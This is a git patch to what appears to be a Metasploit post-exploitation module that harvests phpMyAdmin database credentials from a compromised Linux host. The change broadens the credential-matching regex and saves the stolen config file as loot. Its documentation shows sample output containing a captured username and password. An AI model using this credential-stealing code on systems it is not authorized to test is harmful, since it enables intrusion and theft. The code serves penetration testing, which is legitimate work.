From 18ffd36409633104f11923e7579afd072128515b Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Fri, 7 Sep 2018 08:13:10 -0500 Subject: [PATCH] storing config file, changed regex --- .../modules/post/linux/gather/phpmyadmin_credsteal.md | 1 + modules/post/linux/gather/phpmyadmin_credsteal.rb | 7 +++++-- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md b/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md index 37cf5ffadf..ae077120c7 100644 --- a/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md +++ b/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md @@ -41,6 +41,7 @@ PhpMyAdmin Creds Stealer! [+] User: admin [+] Password: acoolpassword [*] Storing credentials... +[+] Config file located at /Users/space/.msf4/loot/20180907081056_default_192.168.37.226_phpmyadmin_conf_580315.txt [*] Post module execution completed msf5 post(linux/gather/phpmyadmin_credsteal) > diff --git a/modules/post/linux/gather/phpmyadmin_credsteal.rb b/modules/post/linux/gather/phpmyadmin_credsteal.rb index 6c5475b708..a05bd996f8 100644 --- a/modules/post/linux/gather/phpmyadmin_credsteal.rb +++ b/modules/post/linux/gather/phpmyadmin_credsteal.rb @@ -26,8 +26,8 @@ class MetasploitModule < Msf::Post end def parse_creds(contents) - db_user = /\$dbuser=\'(.*)\';/.match(contents) - db_pass = /\$dbpass=\'(.*)\';/.match(contents) + db_user = /\$dbuser=['"](.*)['"];/.match(contents) + db_pass = /\$dbpass=['"](.*)['"];/.match(contents) unless db_user && db_pass print_error("Couldn't find PhpMyAdmin credentials") @@ -66,5 +66,8 @@ class MetasploitModule < Msf::Post print_good("Extracting creds") parse_creds(res) + + p = store_loot('phpmyadmin_conf', 'text/plain', session, res, 'phpmyadmin_conf.txt', 'phpmyadmin_conf') + print_good("Config file located at #{p}") end end